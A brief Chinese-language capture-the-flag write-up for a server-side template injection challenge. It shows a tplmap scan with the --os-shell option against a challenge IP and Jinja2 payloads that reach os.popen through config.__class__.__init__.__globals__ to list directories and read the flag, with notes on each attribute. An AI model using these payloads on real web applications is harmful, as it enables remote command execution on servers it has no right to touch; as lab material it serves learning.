直接扫
python2 tplmap.py -u 'http://114.67.175.224:10589/?flag'
可以注入,使用–os-shell提权
python2 tplmap.py -u 'http://114.67.175.224:10589/?flag' --os-shell
ls查看目录
ls查看
?flag={{%20config.__class__.__init__.__globals__[%27os%27].popen(%27ls%20../%27).read()%20}}
查看根目录##__class__:用来查看变量所属的类,根据前面的变量形式可以得到其所属的类。 ##__init__ 初始化类,返回的类型是function ##__globals__[] 使用方式是 函数名.__globals__获取function所处空间下可使用的module、方法以及所有变量。 ##os.popen() 方法用于从一个命令打开一个管道。 ##open() 方法用于打开一个文件,并返回文件对象
爆app
?flag={{%20config.__class__.__init__.__globals__[%27os%27].popen(%27ls%20../app%27).read()%20}}
最后cat flag得到flag
参考文章